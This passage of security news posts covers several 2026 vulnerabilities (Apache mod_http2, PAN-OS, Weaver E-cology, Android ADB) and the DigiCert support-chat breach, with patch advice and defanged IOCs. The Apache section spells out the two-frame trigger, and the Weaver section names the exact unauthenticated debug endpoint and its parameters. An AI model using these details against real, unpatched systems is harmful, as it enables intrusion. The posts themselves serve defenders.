CVE-2026-23918 is critical, as it can be exploited to achieve both denial-of-service and remote code execution. The vulnerability was reported to the Apache security team on December 10, 2025, fixed in source the following day, and shipped to users in the 2.4.67 release on May 4, 2026. No active exploitation has been confirmed as of the disclosure date. However, a [proof-of-concept demonstrating a reliable crash](https://github.com/12lie20/CVE-2026-23918-test) has already been published on GitHub, and the researchers have confirmed they built a working exploit for x86\_64 in lab conditions. Given that Apache HTTP Server powers a significant share of the world's web infrastructure, rapid patching is essential. CVE ID CVE-2026-23918 CVSS Score 8.8 - High Vulnerability Type Double Free (CWE-415) Affected Component mod\_http2 (h2\_mplx.c) Attack Vector Network (Remote) Authentication None Required Vendor Apache Software Foundation Product Apache HTTP Server Affected Version 2.4.66 Fixed Version 2.4.67 Discovered By B. Dmitruk, S. Strzalkowski Exploitation Status PoC Available - No ITW ## Technical Details CVE-2026-23918 is a double-free vulnerability in the stream cleanup path of h2\_mplx.c within Apache's mod\_http2 module. The bug is triggered when a client sends an HTTP/2 HEADERS frame immediately followed by a RST\_STREAM frame with a non-zero error code on the same stream, before the multiplexer has finished registering the stream internally. This specific sequence creates a race condition where two separate callbacks - the session handler and the backend worker - both attempt to purge the same stream's memory pool. When Apache later iterates over the cleanup array and tries to destroy stream entries, memory that has already been freed is released a second time. This corrupts the APR allocator's internal free list, leading to heap corruption. According to [analysis published by SOC Prime](https://socprime.com/blog/latest-threats/cve-2026-23918-analysis/), the denial-of-service path is the most straightforward outcome. The researchers confirmed that a single TCP connection carrying just two HTTP/2 frames is enough to crash a worker process in default deployments that use mod\_http2 with a multi-threaded MPM such as event or worker. Notably, MPM prefork is not affected by this vulnerability. RCE Path Confirmed in Lab Conditions The researchers confirmed to The Hacker News that the possible RCE path depends on the APR memory allocator using mmap, which is the default configuration on Debian-derived distributions and the official Apache httpd Docker image. Practical exploitation for code execution still requires favorable conditions including an information leak and predictable memory reuse patterns. At this stage, process crashes and worker instability are the most likely real-world impact, though the RCE path should not be dismissed. ## Affected Versions The vulnerability specifically affects Apache HTTP Server version 2.4.66\. As [The CyberSec Guru noted](https://thecybersecguru.com/news/apache-rce-vulnerability-cve-2026-23918/), older releases are not affected by this specific bug, and the fix was shipped in version 2.4.67 alongside patches for four additional vulnerabilities. The 2.4.67 release addresses a total of 11 security issues. | Version | Status | Module Affected | Conditions | | --------------- | ------------ | --------------- | ----------------------------- | | Apache 2.4.66 | Vulnerable | mod\_http2 | HTTP/2 enabled + threaded MPM | | Apache 2.4.67 | Fixed | \- | \- | | Apache < 2.4.66 | Not Affected | \- | \- | Apache 2.4.66 - Vulnerable 2.4.67 - Fixed mod\_http2 MPM event / worker ## Recommendations 1. **Upgrade to Apache HTTP Server 2.4.67 immediately.** This is the only complete fix. The updated version is available from the [official Apache HTTP Server download page](https://httpd.apache.org/download.cgi). The release resolves CVE-2026-23918 along with 10 additional security issues. 2. **Disable HTTP/2 as a temporary mitigation.** If an immediate upgrade is not possible, disable mod\_http2 to eliminate the attack surface entirely. This blocks the RCE and DoS vectors while the upgrade is planned. 3. **Verify your MPM configuration.** Systems running MPM prefork are not affected. If you are running MPM event or worker with mod\_http2 enabled, your deployment is in the vulnerable configuration. 4. **Monitor for unexpected worker crashes.** The most likely exploitation outcome is repeated worker process crashes. Monitor Apache error logs for segmentation faults and abnormal child process restarts that could indicate exploitation attempts. 5. **Review HTTP/2 traffic for anomalous patterns.** The exploit relies on a HEADERS frame followed by an immediate RST\_STREAM with a non-zero error code. Network monitoring tools or WAF rules that flag rapid stream resets on HTTP/2 connections may help detect exploitation attempts. ## Context Apache HTTP Server remains one of the most widely deployed web servers in the world, powering millions of websites and serving as a reverse proxy in countless enterprise architectures. The combination of unauthenticated remote access, the potential for code execution, and the minimal effort required to trigger a crash makes CVE-2026-23918 a particularly noteworthy vulnerability. This is the second major HTTP/2 protocol-level vulnerability to affect Apache in recent years, following the HTTP/2 Rapid Reset attack (CVE-2023-44487) that impacted multiple web server implementations. [The disclosure was posted to the oss-security mailing list](https://www.openwall.com/lists/oss-security/2026/05/04/19) on May 4, 2026\. While [Red Hat has classified the issue as "Important"](https://app.opencve.io/cve/CVE-2026-23918) and confirmed that Red Hat Enterprise Linux 10 is not affected, organizations running the vulnerable version on Debian-derived systems or Docker containers should treat this as an urgent priority due to the default APR mmap allocator configuration that enables the RCE path. ### Palo Alto Networks Warns of Actively Exploited PAN-OS Zero-Day Granting Root Access URL: https://darkwebinformer.com/palo-alto-networks-warns-of-actively-exploited-pan-os-zero-day-granting-root-access/ Last updated: 2026-05-06T15:40:57.000Z ⚠ Zero-Day — Active Exploitation CVE CVE-2026-0300 CVSS 9.3 Critical Vector Network / No Auth Patch Pending — May 13 ## Vulnerability Overview Palo Alto Networks [warned customers today](https://security.paloaltonetworks.com/CVE-2026-0300) that a critical unpatched vulnerability in PAN-OS is being actively exploited in attacks targeting internet-exposed firewalls. Tracked as **CVE-2026-0300**, the flaw is a buffer overflow in the User-ID Authentication Portal (also known as the Captive Portal) service that allows an unauthenticated attacker to execute arbitrary code with root privileges on affected PA-Series and VM-Series firewalls. The vulnerability can be triggered remotely by sending specially crafted packets to the portal service. No credentials, user interaction, or prior access to the device is required. Palo Alto Networks describes the exploitation as automatable, and [confirmed that limited exploitation](https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-actively-exploited-firewall-zero-day/) has been observed targeting Authentication Portals exposed to untrusted IP addresses and the public internet. No patch is currently available. Palo Alto Networks plans to [release the first round of hotfixes on May 13, 2026](https://www.technadu.com/palo-alto-networks-to-patch-exploited-pan-os-zero-day-cve-2026-0300-starting-may-13/627358/), with a second round expected around May 28\. In the interim, the company is urging customers to restrict or disable the vulnerable portal immediately. Internet threat watchdog [Shadowserver is currently tracking over 5,800 PAN-OS VM-series firewalls exposed online](https://www.helpnetsecurity.com/2026/05/06/palo-alto-firewalls-vulnerability-exploited-cve-2026-0300/), with the majority located in Asia (2,466) and North America (1,998). CVE ID CVE-2026-0300 CVSS Score 9.3 — Critical Vulnerability Type Buffer Overflow (CWE-787) Attack Vector Network (Remote) Authentication None Required Privileges Gained Root Vendor Palo Alto Networks Affected Component User-ID Auth Portal (Captive Portal) Affected Products PA-Series, VM-Series Exploitation Status Active — In the Wild Exploit Maturity Attacked / Automatable Patch Status Unpatched — ETA May 13 ## Technical Details CVE-2026-0300 is classified as an out-of-bounds write (CWE-787) in the User-ID Authentication Portal service within PAN-OS. This portal, also referred to as the Captive Portal, is used to identify unknown users by prompting them for credentials when the firewall cannot automatically map an IP address to a user identity. The vulnerability exists in the service's packet handling logic, where a buffer overflow can be triggered by sending specially crafted network packets. Because the overflow occurs in a pre-authentication code path, no credentials are needed to reach the vulnerable function. Successful exploitation overwrites memory in a way that allows the attacker to redirect execution flow and run arbitrary code. The service runs with root privileges on the underlying PAN-OS platform, meaning [a successful exploit grants the attacker full root access](https://thehackernews.com/2026/05/palo-alto-pan-os-flaw-under-active.html) to the firewall. The CVSS score varies depending on the exposure of the portal. When the Authentication Portal is accessible from the internet or any untrusted network, the score is 9.3 (Critical). When access is [restricted to trusted internal IP addresses per Palo Alto's best practice guidelines](https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u000000CqbiCAC), the score drops to 8.7\. Prisma Access, Cloud NGFW, and Panorama appliances are not affected. No Patch Available — Zero-Day This vulnerability is currently unpatched. Palo Alto Networks is developing hotfixes with an estimated first release around May 13, 2026 and a second round around May 28\. Organizations with exposed Authentication Portals should implement the workarounds described below immediately. For customers running PAN-OS 11.1 and above, Palo Alto has released an emergency Threat Prevention Signature to help block exploitation attempts. ## Affected Versions The vulnerability impacts multiple PAN-OS release trains. All versions listed below are vulnerable if the User-ID Authentication Portal is enabled. You can verify your configuration at Device → User Identification → Authentication Portal Settings → Enable Authentication Portal. | PAN-OS Version | Affected Before | Fix ETA | | -------------- | ------------------------------------------------------------------------------- | --------------- | | PAN-OS 12.1 | < 12.1.4-h5, < 12.1.7 | May 13 / May 28 | | PAN-OS 11.2 | < 11.2.4-h17, < 11.2.7-h13, < 11.2.10-h6, < 11.2.12 | May 13 / May 28 | | PAN-OS 11.1 | < 11.1.4-h33, < 11.1.6-h32, < 11.1.7-h6, < 11.1.10-h25, < 11.1.13-h5, < 11.1.15 | May 13 / May 28 | | PAN-OS 10.2 | < 10.2.7-h34, < 10.2.10-h36, < 10.2.13-h21, < 10.2.16-h7, < 10.2.18-h6 | May 13 / May 28 | PAN-OS 12.1 PAN-OS 11.2 PAN-OS 11.1 PAN-OS 10.2 Unpatched — Workarounds Only ## Recommendations 1. **Restrict access to the Authentication Portal immediately.** Configure firewall policies to allow access to the User-ID Authentication Portal only from trusted internal IP addresses and zones. Do not leave this portal exposed to the internet or untrusted networks. 2. **Disable the portal if not required.** If your organization does not actively use the User-ID Authentication Portal, disable it entirely via Device → User Identification → Authentication Portal Settings → Disable Authentication Portal. 3. **Apply Threat Prevention Signatures.** For firewalls running PAN-OS 11.1 and above with an active Threat Prevention subscription, apply the emergency signature released by Palo Alto Networks to block known exploitation patterns. 4. **Monitor for indicators of compromise.** Review firewall logs for unusual access patterns to the Authentication Portal, unexpected process executions, and connections to unknown external infrastructure. A compromised firewall running as root gives an attacker full visibility into network traffic. 5. **Apply patches as soon as they are available.** The [first round of hotfixes is expected around May 13, 2026](https://security.paloaltonetworks.com/CVE-2026-0300). Subscribe to the Palo Alto Networks security advisory RSS feed to receive notifications when patches are published. ## Context Palo Alto Networks firewalls are among the most widely deployed perimeter security devices in enterprise environments. The combination of pre-authentication access, root-level code execution, and automatable exploitation makes CVE-2026-0300 an exceptionally dangerous vulnerability. As [SOCRadar noted in its analysis](https://socradar.io/blog/cve-2026-0300-root-rce-pan-os-captive-portal/), this vulnerability has the profile that advanced persistent threat groups and ransomware operators actively seek: a network edge device with pre-auth RCE that provides full visibility into traffic flows and lateral movement capability. This is not the first time Palo Alto Networks has faced critical exploitation of its firewall products. The [Tenable vulnerability database rates CVE-2026-0300 at a base score of 10.0](https://www.tenable.com/cve/CVE-2026-0300), the maximum possible. The CISA Known Exploited Vulnerabilities catalog currently includes 13 Palo Alto product vulnerabilities, though CVE-2026-0300 has not yet been added. Organizations that fail to implement workarounds before patches become available should expect a surge in exploitation attempts as awareness of the vulnerability spreads. ### Weaver E-cology RCE Flaw Actively Exploited via Exposed Debug API URL: https://darkwebinformer.com/weaver-e-cology-rce-flaw-actively-exploited-via-exposed-debug-api/ Last updated: 2026-05-05T16:39:05.000Z ⚠ Active Exploitation — CVSS 9.8 CVE CVE-2026-22679 Type Unauthenticated RCE Vector Network / No Auth ## Vulnerability Overview A critical unauthenticated remote code execution vulnerability is being actively exploited in Weaver E-cology, a widely deployed enterprise collaboration and office automation platform. Tracked as **CVE-2026-22679** with a CVSS score of 9.8, the flaw allows attackers to execute arbitrary operating system commands on vulnerable servers without any authentication. The vulnerability resides in an exposed debug endpoint that is part of the Dubbo RPC framework integration. Attackers can craft HTTP POST requests with attacker-controlled parameters that are passed directly into internal method invocation logic without validation, ultimately reaching OS command execution helpers within the application's Java Virtual Machine running under Tomcat. The Shadowserver Foundation observed the first signs of active exploitation on March 31, 2026\. Chinese security vendor QiAnXin independently confirmed successful reproduction of the vulnerability on March 17, 2026\. The Vega Research Team published a detailed report documenting a confirmed intrusion campaign that began as early as March 17, 2026 — just five days after patches were shipped. CVE ID CVE-2026-22679 CVSS Score 9.8 — Critical Vulnerability Type Missing Authentication (CWE-306) Attack Vector Network (Remote) Authentication None Required User Interaction None Vendor Weaver (Fanwei) Product E-cology 10.0 Affected Builds Prior to 20260312 Exploitation Status Active — In the Wild First Exploitation March 17, 2026 Patch Status Fixed — Build 20260312 ## Technical Details The vulnerability exists in the exposed Dubbo RPC debug endpoint at /papi/esearch/data/devops/dubboApi/debug/method. This endpoint is designed for internal development and debugging purposes but was left accessible without authentication in production deployments of E-cology 10.0\. The endpoint accepts HTTP POST requests containing JSON parameters including "interfaceName" and "methodName" fields. These user-supplied inputs are passed directly into the Dubbo RPC framework's method invocation logic without sanitization or authorization checks. An attacker can specify crafted values for these parameters to invoke internal Java methods that ultimately reach OS command execution helpers within the application's JVM. Because the application runs under Tomcat, successful exploitation grants command execution with the privileges of the Tomcat service account. The vendor addressed the vulnerability on March 12, 2026, by removing the vulnerable debug endpoint entirely from production builds. Public proof-of-concept exploits are available, and detection scripts for both Python and Nmap have been published on GitHub. Confirmed Intrusion Campaign The Vega Research Team documented a confirmed multi-phase intrusion campaign exploiting CVE-2026-22679\. The attack targeted an internet-facing Windows server running an unpatched E-cology instance. All malicious activity originated from java.exe, confirming the RCE vulnerability as the entry point. The campaign included RCE verification via ping callbacks, three failed payload delivery attempts using PowerShell, an MSI implant disguised as "fanwei0324.msi" (using the romanized Chinese name for Weaver), and discovery commands including whoami, ipconfig, and tasklist. ## Affected Versions The vulnerability affects all Weaver E-cology 10.0 builds released prior to March 12, 2026\. The vendor has not released comprehensive information about whether earlier major versions (9.x and below) are also affected. Organizations should verify their specific deployment with the vendor. | Product | Affected Builds | Fixed Build | Status | | ------------------------ | --------------------- | ----------- | ----------------- | | E-cology 10.0 | All builds < 20260312 | 20260312 | Patched | | E-cology 9.x and earlier | Unknown | — | Check with Vendor | ## Recommendations 1. **Update E-cology to build 20260312 or later immediately.** This update removes the vulnerable debug endpoint entirely. Contact Weaver support if you are unable to locate the update through standard channels. 2. **Block access to the vulnerable endpoint.** As an interim measure, configure your web application firewall or reverse proxy to deny all requests to the path /papi/esearch/data/devops/dubboApi/debug/method. 3. **Audit for indicators of compromise.** Review process execution logs for suspicious child processes spawned by java.exe, particularly whoami, ipconfig, tasklist, powershell.exe, and msiexec.exe. Check for connections to external infrastructure or the presence of unfamiliar MSI packages. 4. **Restrict internet exposure.** Weaver E-cology instances should not be directly accessible from the public internet without authentication and network-level access controls. Place them behind a VPN or Zero Trust access gateway. 5. **Run detection scans.** Use the publicly available [CVE-2026-22679 detection scanner](https://github.com/keraattin/CVE-2026-22679) to identify vulnerable instances in your environment. The tool performs safe, non-destructive endpoint checks. ## Context Weaver E-cology is one of the most widely deployed enterprise OA (Office Automation) platforms in China, used across government agencies, financial institutions, manufacturing firms, and large enterprises for workflow management, document collaboration, and internal communications. The platform's broad adoption makes it a high-value target for threat actors, particularly those operating in or targeting the Chinese enterprise ecosystem. The speed of exploitation — just five days after the patch release — underscores the importance of rapid patch adoption for internet-facing enterprise applications. The confirmed intrusion campaign demonstrated a methodical attack sequence including initial verification, multiple payload delivery attempts, and lateral movement preparation, suggesting an organized threat actor rather than opportunistic scanning. ## References - [The Hacker News — Weaver E-cology RCE Flaw CVE-2026-22679 Actively Exploited via Debug API](https://thehackernews.com/2026/05/weaver-e-cology-rce-flaw-cve-2026-22679.html) - [NVD — CVE-2026-22679](https://nvd.nist.gov/vuln/detail/CVE-2026-22679) - [MITRE — CVE-2026-22679 Record](https://www.cve.org/CVERecord?id=CVE-2026-22679) - [GitHub — CVE-2026-22679 Detection Scanner & Analysis](https://github.com/keraattin/CVE-2026-22679) - [CyberPress — Critical Weaver E-cology RCE Flaw Actively Exploited by Attackers](https://cyberpress.org/weaver-e-cology-rce-flaw/) ### CVE-2026-0073: Zero-Click RCE Flaw in Android's Wireless ADB Bypasses Authentication URL: https://darkwebinformer.com/cve-2026-0073-zero-click-rce-flaw-in-androids-wireless-adb-bypasses-authentication/ Last updated: 2026-05-05T15:15:17.000Z ⚠ Critical — Zero-Click RCE CVE CVE-2026-0073 Type Authentication Bypass Vector Adjacent Network ## Vulnerability Overview Google has published the [May 2026 Android Security Bulletin](https://source.android.com/docs/security/bulletin/2026/2026-05-01), addressing a critical remote code execution vulnerability in the Android System component. Tracked as **CVE-2026-0073**, the flaw resides in the Android Debug Bridge daemon (adbd) and allows an attacker within wireless proximity to gain remote shell access to a target device — without requiring a single tap, download, or click from the device owner. The vulnerability is classified as zero-click, meaning no user interaction is needed for exploitation. An attacker on the same local network or within physical proximity of the target device can silently trigger the exploit to execute arbitrary code as the "shell" user, bypassing normal application sandboxes. The severity assessment for this flaw is critical. The root cause lies in a logic error within the adbd\_tls\_verify\_cert function in auth.cpp, which handles mutual TLS authentication for wireless ADB connections. The flaw allows an attacker to bypass the wireless ADB mutual authentication mechanism entirely, establishing an authenticated debugging session without possessing valid credentials or being paired with the device. CVE ID CVE-2026-0073 Severity Critical Vulnerability Type Authentication Bypass (Logic Error) Affected Component System — adbd (Project Mainline) Attack Vector Adjacent Network (Proximal) User Interaction None — Zero-Click Privileges Required None Impact Remote Code Execution (shell) Vendor Google Product Android Published May 4, 2026 Patch Level 2026-05-01 ## Technical Details CVE-2026-0073 is an authentication bypass vulnerability in the adbd\_tls\_verify\_cert function of Android's auth.cpp. This function is responsible for verifying the TLS certificate presented by a connecting host during the wireless ADB pairing and connection flow introduced in Android 11\. A logic error in the certificate verification code allows an attacker to bypass the mutual authentication mechanism that is supposed to ensure only previously paired hosts can establish a debugging session. When wireless debugging is enabled on an Android device, the adbd process listens on a randomly assigned TCP port and advertises its presence via mDNS. Legitimate connections require TLS mutual authentication — the connecting host must present a certificate that matches a key previously stored during pairing. The flaw in adbd\_tls\_verify\_cert breaks this trust model, allowing an unauthenticated attacker who can reach the device over the network to establish a fully authenticated ADB session. Because ADB provides a Unix shell with access to file systems, package management, process control, and debugging interfaces, successful exploitation grants the attacker broad capabilities on the device. The "shell" user context allows executing commands, installing and removing applications, reading application data from debuggable apps, capturing screen content, and interacting with device services. Zero-Click Exploitation This vulnerability requires no user interaction whatsoever. An attacker on the same Wi-Fi network or within adjacent network range can discover vulnerable devices via mDNS service advertisements and exploit the authentication bypass silently. The attack does not require the victim to click a link, install an app, or approve any prompt. Devices with wireless debugging enabled are immediately vulnerable. ## Affected Versions The vulnerability affects all Android devices running versions 14, 15, 16, and 16-qpr2 that have not been updated to the May 2026 security patch level. Because the affected adbd component is part of Project Mainline, Google can push targeted fixes directly through Google Play system updates, bypassing traditional carrier and OEM update timelines. | Android Version | Status | Patch Level | | --------------- | -------- | ----------- | | Android 14 | Affected | 2026-05-01 | | Android 15 | Affected | 2026-05-01 | | Android 16 | Affected | 2026-05-01 | | Android 16-qpr2 | Affected | 2026-05-01 | Android 14 Android 15 Android 16 Android 16-qpr2 Patched: 2026-05-01 ## Recommendations 1. **Update to the May 2026 security patch immediately.** Navigate to Settings → Security & privacy → System & updates to verify your device is running security patch level 2026-05-01 or later. Apply any pending updates and restart the device. 2. **Check for Google Play system updates.** Devices running Android 10 or later may receive the fix through Google Play system updates. Navigate to Settings → Security & privacy → System & updates → Google Play system update to check. 3. **Disable wireless debugging when not in use.** Navigate to Settings → Developer options → Wireless debugging and toggle it off. This eliminates the network-exposed attack surface entirely until the patch is applied. 4. **Restrict network exposure.** Avoid connecting to untrusted or public Wi-Fi networks until the device is patched. The attack requires adjacent network access, so limiting network exposure reduces risk. 5. **Enterprise administrators should prioritize MDM-pushed updates.** Organizations managing Android fleets should push the May 2026 security update across managed devices immediately and consider disabling wireless debugging via device management policies. ## Context CVE-2026-0073 is the most critical vulnerability addressed in Google's May 2026 Android Security Bulletin. The zero-click, zero-privilege nature of the attack makes it particularly dangerous in environments where multiple devices share a common network — corporate offices, hotels, airports, and university campuses are all scenarios where adjacent network access is trivially obtained. The Hong Kong Computer Emergency Response Team (HKCERT) issued a dedicated advisory for CVE-2026-0073 on May 5, 2026, classifying it as a remote code execution threat. Android's built-in protections — including application sandboxing, Google Play Protect, and platform hardening in newer versions — help limit the blast radius of exploitation, but do not prevent the initial compromise. Source code patches will be released to the Android Open Source Project (AOSP) repository within 48 hours of the bulletin's publication. ## References - [Google — Android Security Bulletin, May 2026](https://source.android.com/docs/security/bulletin/2026/2026-05-01) - [NVD — CVE-2026-0073](https://nvd.nist.gov/vuln/detail/CVE-2026-0073) - [HKCERT — Android Remote Code Execution Vulnerability](https://www.hkcert.org/security-bulletin/android-remote-code-execution-vulnerability%5F20260505) - [Cyber Security News — Critical Android Zero-Click Vulnerability Grants Remote Shell Access](https://cybersecuritynews.com/android-zero-click-vulnerability/) - [GBHackers — Critical Android Zero-Click Vulnerability Enables Remote Shell Access](https://gbhackers.com/critical-android-zero-click-vulnerability/) ### Daily Dose of Dark Web Informer - May 4th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-4th-2026/ Last updated: 2026-05-04T21:54:20.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence 📰 [The cPanel Situation Is Spiraling Fast](https://darkwebinformer.com/the-cpanel-situation-is-spiraling-fast/) FREE 📰 [When the Watchman Gets Watched: Trellix Discloses Source Code Breach](https://darkwebinformer.com/when-the-watchman-gets-watched-trellix-discloses-source-code-breach/) FREE 📰 ["Copy Fail" Lands on CISA's KEV: A Nine-Year-Old Linux Bug Becomes a Patch Deadline](https://darkwebinformer.com/copy-fail-lands-on-cisas-kev-a-nine-year-old-linux-bug-becomes-a-patch-deadline/) FREE 📰 [When a Screensaver Cracked the Internet's Trust Layer: Inside the DigiCert Hack](https://darkwebinformer.com/when-a-screensaver-cracked-the-internets-trust-layer-inside-the-digicert-hack/) FREE X/Twitter Updates ❗️ [An Egyptian database containing 1.5 million student records and a 60 million record HR database (37GB total) is allegedly being sold on a hacking forum, exposing extensive PII including ID scans and passport copies.](https://x.com/DarkWebInformer/status/2051319542408790199?s=20) ❗️ [A new IVR (Interactive Voice Response) 0day automation tool is allegedly being sold on a hacking forum, marketed for high-speed SIP-based attacks against voice menu systems.](https://x.com/DarkWebInformer/status/2051324313576288583?s=20) ❗️ [Fund for Teachers (http://fundforteachers.org), a U.S. nonprofit that provides grants to teachers, has allegedly been breached, with a database containing 51,458 unique user records and grant application data leaked.](https://x.com/DarkWebInformer/status/2051328222692884947?s=20) ❗️ [Groupe CGA, a French automotive dealership group, has allegedly been breached, with customer and employee databases offered for sale.](https://x.com/DarkWebInformer/status/2051332078885630045?s=20) ❗️ [Zurich Insurance has allegedly been breached, with a massive leak containing over 4.26 million insurance contract records and a second file covering insurance policies released for free.](https://x.com/DarkWebInformer/status/2051361232473432285?s=20) ❗️ [Handala Hack has launched a coordinated attack on the Fujairah Port and other entities in the UAE.](https://x.com/DarkWebInformer/status/2051368686502482026?s=20) ❗️ [Bouygues Telecom, one of France's largest telecommunications providers, has allegedly been breached, with an 80.9 GB database being offered for sale by a new threat actor group.](https://x.com/DarkWebInformer/status/2051369863168368951?s=20) 💡 [Notepad now gaslights you about what you just typed](https://x.com/DarkWebInformer/status/2051379025508008210?s=20) ❗️ [La Redoute, a major French e-commerce and home goods retailer, has allegedly been scraped, with a dataset of 96,191 customer expedition (shipment) records leaked.](https://x.com/DarkWebInformer/status/2051384398826848268?s=20) ❗️ [Johnson & Johnson Innovative Medicine has been claimed a victim to SpaceBears Ransomware](https://x.com/DarkWebInformer/status/2051392139506913729?s=20) ❗️ [Latvian national Deniss Zolotarjovs sentenced to 102 months (8.5 yrs) for his role in a Russia-based ransomware org tied to Conti, Karakurt, Royal & Akira.](https://x.com/DarkWebInformer/status/2051401413457223953?s=20) ❗️ [Lexus has been claimed a victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2051406587487539641?s=20) ❗️ [Azzorti, a Latin American direct-sales beauty and fashion brand operating across Guatemala and Ecuador, has allegedly been breached, with the entire database from http://intranet.azzorti.com and http://intranet.azzorti.gt offered for sale.](https://x.com/DarkWebInformer/status/2051413804685074696?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### When a Screensaver Cracked the Internet's Trust Layer: Inside the DigiCert Hack URL: https://darkwebinformer.com/when-a-screensaver-cracked-the-internets-trust-layer-inside-the-digicert-hack/ Last updated: 2026-05-05T22:01:37.000Z **#Update 2026-05-05** // CrowdStrike's marketing team alerted me to the following update on [Bugzilla](https://bugzilla.mozilla.org/show%5Fbug.cgi?id=2033170#c3). The full incident report was updated with the following to acknowledge CrowdStrike wasn't installed or configured on the endpoint: > On 2026-04-14, further investigation identified that ENDPOINT2, a machine used by another analyst was compromised through the same delivery vector on 2026-04-04\. CrowdStrike was not installed or configured on that endpoint, meaning the compromise was not detected during the earlier 2026-04-03 investigation. The machine was established more than 3 years ago. Because our end-user machine logs are retained for three years, we cannot determine why CrowdStrike was not installed or configured on this particular endpoint. --- Certificate authorities sit at the foundation of online trust. So when one of the largest, [DigiCert](https://www.digicert.com/), gets hacked through a fake screenshot in a customer support chat, it is worth paying attention. ## What happened In early April 2026, a threat actor posed as a customer and contacted DigiCert's support team through its chat channel. The attacker uploaded a [malicious ZIP file disguised as a customer screenshot](https://www.helpnetsecurity.com/2026/05/04/digicert-breach-code-signing-certificates-malware/), which actually contained a .scr file, the format Windows uses for screensavers. After several blocked attempts, two support analyst machines were eventually compromised. From there, the attacker used a feature inside DigiCert's internal support portal that lets authenticated analysts view customer accounts from the customer's perspective. While that view does not allow account changes or new orders, [it did expose initialization codes for previously approved but undelivered EV code signing certificate orders](https://www.bleepingcomputer.com/news/security/microsoft-defender-wrongly-flags-digicert-certs-as-trojan-win32-cerdigentadha/). Combined with an approved order, those codes were enough to obtain real, trusted code signing certificates. ## How bad was it DigiCert ultimately [revoked 60 code signing certificates](https://www.securityweek.com/digicert-revokes-certificates-after-support-portal-hack/), 27 of which were tied directly to the attacker. Eleven of those were already being used in the wild to sign the [Zhong Stealer malware family](https://www.securityweek.com/digicert-revokes-certificates-after-support-portal-hack/) when community researchers flagged them. One detail stands out. On the second compromised analyst machine, the attacker stayed put for nearly two weeks because the [CrowdStrike EDR agent had been misconfigured](https://news.risky.biz/risky-bulletin-digicert-hacked-with-a-malicious-screensaver-file/) and was not reporting to its central management server. DigiCert openly described itself as "lucky" that an outside security researcher noticed certificates being abused and reported it, which is what triggered the broader investigation. ## The Microsoft Defender twist Just as the dust was settling, things got messier. A [faulty Microsoft Defender signature update](https://cipherssecurity.com/microsoft-defender-digicert-cerdigent-false-positive-2026/) deployed on April 30, 2026 began flagging two legitimate DigiCert root CA certificates as Trojan:Win32/Cerdigent.A!dha and silently removing them from Windows trust stores. That had nothing to do with the actual breach, but it threatened to disrupt SSL/TLS validation and code signing across enterprise environments worldwide. Microsoft pushed a corrective update that began restoring the quarantined certificates, and researcher [Florian Roth shared certutil queries](https://cybersecuritynews.com/defender-flags-digicert-root-certificates/) admins could use to verify their systems. ## What DigiCert changed In response, DigiCert tightened several controls: enforcing MFA on administrative workflows, blocking access to initialization codes when staff are proxied into customer accounts, restricting attachment file types in support chat and Salesforce cases, and improving logging. ## Indicators of compromise The IOCs below were published in DigiCert's [Mozilla incident report](https://bugzilla.mozilla.org/show%5Fbug.cgi?id=2033170) and corroborated by community researchers. | Type | Indicator | Notes | | ----------------------- | -------------------------------------------------------------------- | --------------------------------------------------------- | | IP address | 82\[.\]23\[.\]186\[.\]8 | Used by threat actor to install certificates | | IP address | 154\[.\]12\[.\]185\[.\]32 | Used by threat actor to install certificates | | IP address | 154\[.\]12\[.\]185\[.\]30 | Used by threat actor to install certificates | | IP address | 45\[.\]144\[.\]227\[.\]12 | Used by threat actor to install certificates | | IP address | 45\[.\]144\[.\]227\[.\]29 | Used by threat actor to install certificates | | IP address | 203\[.\]160\[.\]68\[.\]2 | Used by threat actor to install certificates | | IP address | 62\[.\]197\[.\]153\[.\]45 | Used by threat actor to install certificates | | File type | .scr inside ZIP archive | Malicious payload disguised as a customer screenshot | | Malware family | Zhong Stealer | Credential and cryptocurrency stealer; behaves like a RAT | | Threat group | GoldenEyeDog (APT-Q-27) | Chinese e-crime group linked to the certificates | | Issuing CA | DigiCert Trusted G4 Code Signing RSA4096 SHA256 2021 CA1 | Source of revoked certificates | | Issuing CA | DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 | Source of revoked certificates | | Impacted subjects | Lenovo, Kingston, Shuttle Inc, Palit Microsystems, Tencent, DigiFors | Organizations whose pending EV orders were abused | | Defender false positive | Trojan:Win32/Cerdigent.A!dha | Unrelated Defender bug that flagged DigiCert root CAs | | Root cert thumbprint | 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | DigiCert Assured ID Root CA, falsely flagged | | Root cert thumbprint | DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | DigiCert Trusted Root G4, falsely flagged | The full list of 60 revoked certificate serial numbers is available in the [appendix of DigiCert's Bugzilla incident report](https://bugzilla.mozilla.org/show%5Fbug.cgi?id=2033170). ## The takeaway This breach is a clean case study in modern social engineering. There was no zero day, no exotic exploit chain. A .scr file in a chat message and one misconfigured EDR agent were enough to reach into the certificate issuance pipeline of a top tier CA. For the rest of us, the lessons write themselves: lock down what support staff can see and do on behalf of customers, verify 